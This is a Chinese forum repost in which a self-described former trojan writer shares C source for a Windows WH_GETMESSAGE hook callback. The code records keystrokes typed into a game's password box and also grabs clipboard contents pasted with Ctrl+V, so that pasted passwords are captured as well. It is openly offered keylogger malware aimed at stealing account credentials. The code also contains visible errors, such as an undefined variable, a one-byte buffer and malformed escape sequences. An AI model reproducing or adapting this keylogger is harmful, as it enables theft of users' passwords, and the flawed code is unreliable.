转自:火狐论坛
以前写过木马程序,先挂个WH_GETMESSAGE钩子,判断登陆键是否按下,又装个WH_KEYBOARD钩子,取密码键盘记录.钩子不易多用.
发现只用WH_GETMESSAGE就可以了,这个就是WH_GETMESSAGE的回调函数.
嘿嘿,有人说我用复制,这个我连复制都给他处理了.
/*---------------------------------------------------
*File:
*Effect: 利用WM_GETMESSAGE做键盘记录
*Edit: Huai_Huai
*Page: http://www.520160.com
*Date: 2005.11.24
*Compile by VC++6.0 on Winxp sp2
----------------------------------------------------*/
LRESULT CALLBACK GameHookProc(
int code, // hook code
WPARAM wParam, // removal flag
LPARAM lParam // address of structure with message
)
{
MSG *pMsg=(MSG*)lParam;
if(code<0)
return(CallNextHookEx(hGameHook,code,wParam,lParam));
if(ncode==HC_ACTION){
if(pMsg->message==WM_KEYDOWN)
{
if(GetFocus()==GetGamePassHandle())
{
HANDLE HFile=0;
char szBuffer[1];
ZeroMemory(szBuffer,1);
//shift键按下
BOOL b_Sft=GetAsyncKeyState(VK_SHIFT)>>((sizeof(short)*8)-1);
if(!b_Sft)
{
switch(pMsg->wParam)
{
//数字键
case '1':sprintf(szBuffer,"%s","1");break;
case '2':sprintf(szBuffer,"%s","2");break;
case '3':sprintf(szBuffer,"%s","3");break;
case '4':sprintf(szBuffer,"%s","4");break;
case '5':sprintf(szBuffer,"%s","5");break;
case '6':sprintf(szBuffer,"%s","6");break;
case '7':sprintf(szBuffer,"%s","7");break;
case '8':sprintf(szBuffer,"%s","8");break;
case '9':sprintf(szBuffer,"%s","9");break;
case '0':sprintf(szBuffer,"%s","0");break;
//字母键
case 'A':sprintf(szBuffer,"%s","a");break;
case 'B':sprintf(szBuffer,"%s","b");break;
case 'C':sprintf(szBuffer,"%s","c");break;
case 'D':sprintf(szBuffer,"%s","d");break;
case 'E':sprintf(szBuffer,"%s","e");break;
case 'F':sprintf(szBuffer,"%s","f");break;
case 'G':sprintf(szBuffer,"%s","g");break;
case 'H':sprintf(szBuffer,"%s","h");break;
case 'I':sprintf(szBuffer,"%s","i");break;
case 'J':sprintf(szBuffer,"%s","j");break;
case 'K':sprintf(szBuffer,"%s","k");break;
case 'L':sprintf(szBuffer,"%s","l");break;
case 'M':sprintf(szBuffer,"%s","m");break;
case 'N':sprintf(szBuffer,"%s","n");break;
case 'O':sprintf(szBuffer,"%s","o");break;
case 'P':sprintf(szBuffer,"%s","p");break;
case 'Q':sprintf(szBuffer,"%s","q");break;
case 'R':sprintf(szBuffer,"%s","r");break;
case 'S':sprintf(szBuffer,"%s","s");break;
case 'T':sprintf(szBuffer,"%s","t");break;
case 'U':sprintf(szBuffer,"%s","u");break;
case 'V':if(!(GetAsyncKeyState(VK_CONTROL)>>((sizeof(short)*8)-1)))
sprintf(szBuffer,"%s","v");break;
case 'W':sprintf(szBuffer,"%s","w");break;
case 'X':sprintf(szBuffer,"%s","x");break;
case 'Y':sprintf(szBuffer,"%s","y");break;
case 'Z':sprintf(szBuffer,"%s","z");break;
}
}
else
{
switch(pMsg->wParam)
{
//数字键
case '1':sprintf(szBuffer,"%s","!");break;
case '2':sprintf(szBuffer,"%s","@");break;
case '3':sprintf(szBuffer,"%s","#");break;
case '4':sprintf(szBuffer,"%s","$");break;
case '5':sprintf(szBuffer,"%s","%");break;
case '6':sprintf(szBuffer,"%s","^");break;
case '7':sprintf(szBuffer,"%s","&");break;
case '8':sprintf(szBuffer,"%s","*");break;
case '9':sprintf(szBuffer,"%s","(");break;
case '0':sprintf(szBuffer,"%s",")");break;
//字母键
case 'A':sprintf(szBuffer,"%s","A");break;
case 'B':sprintf(szBuffer,"%s","B");break;
case 'C':sprintf(szBuffer,"%s","C");break;
case 'D':sprintf(szBuffer,"%s","D");break;
case 'E':sprintf(szBuffer,"%s","E");break;
case 'F':sprintf(szBuffer,"%s","F");break;
case 'G':sprintf(szBuffer,"%s","G");break;
case 'H':sprintf(szBuffer,"%s","H");break;
case 'I':sprintf(szBuffer,"%s","I");break;
case 'J':sprintf(szBuffer,"%s","J");break;
case 'K':sprintf(szBuffer,"%s","K");break;
case 'L':sprintf(szBuffer,"%s","L");break;
case 'M':sprintf(szBuffer,"%s","M");break;
case 'N':sprintf(szBuffer,"%s","N");break;
case 'O':sprintf(szBuffer,"%s","O");break;
case 'P':sprintf(szBuffer,"%s","P");break;
case 'Q':sprintf(szBuffer,"%s","W");break;
case 'R':sprintf(szBuffer,"%s","R");break;
case 'S':sprintf(szBuffer,"%s","S");break;
case 'T':sprintf(szBuffer,"%s","T");break;
case 'U':sprintf(szBuffer,"%s","U");break;
case 'V':if(!(GetAsyncKeyState(VK_CONTROL)>>((sizeof(short)*8)-1)))
sprintf(szBuffer,"%s","V");break;
case 'W':sprintf(szBuffer,"%s","W");break;
case 'X':sprintf(szBuffer,"%s","X");break;
case 'Y':sprintf(szBuffer,"%s","Y");break;
case 'Z':sprintf(szBuffer,"%s","Z");break;
}
}
switch(pMsg->wParam)
{
//case VK_BACK:sprintf(szBuffer,"%s","");break;
case VK_NUMPAD1:sprintf(szBuffer,"%s","1");break;
case VK_NUMPAD2:sprintf(szBuffer,"%s","2");break;
case VK_NUMPAD3:sprintf(szBuffer,"%s","3");break;
case VK_NUMPAD4:sprintf(szBuffer,"%s","4");break;
case VK_NUMPAD5:sprintf(szBuffer,"%s","5");break;
case VK_NUMPAD6:sprintf(szBuffer,"%s","6");break;
case VK_NUMPAD7:sprintf(szBuffer,"%s","7");break;
case VK_NUMPAD8:sprintf(szBuffer,"%s","8");break;
case VK_NUMPAD9:sprintf(szBuffer,"%s","9");break;
case VK_NUMPAD0:sprintf(szBuffer,"%s","0");break;
case VK_MULTIPLY:sprintf(szBuffer,"%s","*");break;
case VK_ADD: sprintf(szBuffer,"%s","+");break;
case VK_SUBTRACT:sprintf(szBuffer,"%s","-");break;
case VK_DECIMAL: sprintf(szBuffer,"%s",".");break;
case VK_DIVIDE: sprintf(szBuffer,"%s","/");break;
}
//其他键的处理
char KeyNameStr[50];
ZeroMemory(KeyNameStr,50);
GetKeyNameText(pMsg->lParam,KeyNameStr,50);
if(stricmp(KeyNameStr,"`")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","~");
else
sprintf(szBuffer,"%s","`");
}
if(stricmp(KeyNameStr,"-")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","_");
else
sprintf(szBuffer,"%s","-");
}
if(stricmp(KeyNameStr,"=")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","+");
else
sprintf(szBuffer,"%s","=");
}
if(stricmp(KeyNameStr,"[")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","{");
else
sprintf(szBuffer,"%s","[");
}
if(stricmp(KeyNameStr,"]")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","}");
else
sprintf(szBuffer,"%s","]");
}
if(stricmp(KeyNameStr,";")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s",":");
else
sprintf(szBuffer,"%s",";");
}
if(stricmp(KeyNameStr,"'")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","/"");
else
sprintf(szBuffer,"%s","'");
}
if(stricmp(KeyNameStr,",")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","<");
else
sprintf(szBuffer,"%s",",");
}
if(stricmp(KeyNameStr,".")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s",">");
else
sprintf(szBuffer,"%s",".");
}
if(stricmp(KeyNameStr,"/")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","?");
else
sprintf(szBuffer,"%s","/");
}
if(stricmp(KeyNameStr,"//")==0)
{
if(b_Sft)
sprintf(szBuffer,"%s","|");
else
sprintf(szBuffer,"%s","//");
}
if(pMsg->wParam ==VK_BACK)
{
if(ipass>0)
{
GamePass[--ipass]='/0';
}
}
else
{
ipass++;
strcat(GamePass,szBuffer);
}
//你以为用复制我就没办法吗?
if(GetAsyncKeyState(VK_CONTROL)>>((sizeof(short)*8)-1))
{
if(pMsg->wParam =='V')
{
int i;
GLOBALHANDLE hGlobal;
hGlobal=GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT,255);
OpenClipboard (pMsg->hwnd) ;
hGlobal = GetClipboardData (CF_TEXT) ;
i=GlobalSize(hGlobal);
char* pText = (char *) malloc (i) ;
LPVOID pGlobal = GlobalLock (hGlobal) ;
strcpy(pText,(char *)pGlobal);
GlobalUnlock (hGlobal) ;
CloseClipboard () ;
strcat(GamePass,pText);
}
}
//GetKeyNameText(pMsg->lParam,szBuffer,sizeof(szBuffer));
//MessageBox(0,szBuffer,NULL,MB_OK);
}
}
}
return(CallNextHookEx(hGameHook,code,wParam,lParam));
}